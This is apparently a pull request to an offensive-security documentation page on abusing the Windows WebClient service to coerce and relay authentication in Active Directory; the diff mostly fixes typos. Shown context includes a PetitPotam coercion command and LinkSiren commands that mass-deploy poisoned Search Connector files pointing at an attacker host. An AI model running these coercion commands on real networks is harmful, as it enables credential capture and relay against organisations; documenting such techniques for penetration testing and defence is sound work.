### PR TITLE
Add WebClient Abuse Tactics

### DIFF
--- a/docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md
+++ b/docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md
@@ -17,7 +17,7 @@ The WebClient service needs to be enabled for WebDAV-based programs and features
 Attackers can remotely enumerate systems on which the WebClient is running, which is not uncommon in organizations that use OneDrive or SharePoint or when mounting drives with a WebDAV connection string.
 
 > [!TIP]
-> Even if the WebClient service is not currently running on a remote system, the coercion techniques in the abuse section will cause it to start if it is installed and in the state "Manual (Triggered Start)", default for Windows 10 and Windows 11. By default, the WebClient service is not installed on Windows Servers beginning with Windows Server 2008 per [WebDAVSystem](https://www.webdavsystem.com/server/access/windows). 
+> Even if the WebClient service is not currently running on a remote system, the coercion techniques in the abuse section will cause it to start if it is installed and in the state "Manual (Trigger Start)", default for Windows 10 and Windows 11. By default, the WebClient service is not installed on Windows Servers beginning with Windows Server 2008 per [WebDAVSystem](https://www.webdavsystem.com/server/access/windows). 
 
 ::: tabs
 
@@ -70,6 +70,7 @@ PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "VICTIM_IP"
 ```
 
 In addition to remote system accounts, an attacker may also force authentication from a remote user account that opens a folder containing a SearchConnector using Windows Explorer from a Windows system where the WebClient service is installed.
+
 [LinkSiren](https://github.com/gjhami/LinkSiren) (Python) crawls and ranks accessible share locations based on the number of recently accessed files. It can then be used to deploy and cleanup poisoned Search Connector files at scale that coerce both SMB and HTTP authentication.
 
 ```bash
@@ -77,7 +78,7 @@ In addition to remote system accounts, an attacker may also force authentication
 linksiren identify --targets '/path/to/base_targets.txt' 'DOMAIN'/'USERNAME':'PASSWORD'
 
 # Mass deploy poisoned Search Connectors to a list of target UNC paths to folders
-linksiren deploy --targets '/path/to/foler_targets.txt' --attacker 'ATTACKER_NETBIOS_NAME' 'DOMAIN'/'USERNAME':'PASSWORD'
+linksiren deploy --targets '/path/to/folder_targets.txt' --attacker 'ATTACKER_NETBIOS_NAME' 'DOMAIN'/'USERNAME':'PASSWORD'
 
 # Capture and relay incoming authentication
 


### PR DESCRIPTION
Add the following:
- Describe that even when not currently running, the WebClient service can be remotely started using PetitPotam and other coercion methods.
- Describe additional methods for getting 'intranet zoned' through DNS manipulation including Microsoft DHCP DNS abuse through DDSpoof, non-secure dynamic DNS updates, and DHCPv6 abuse.
- Added notes on a tool I created for mass targeting, deployment, and cleanup of files capable of coercing HTTP authentication from user accounts via the WebClient service.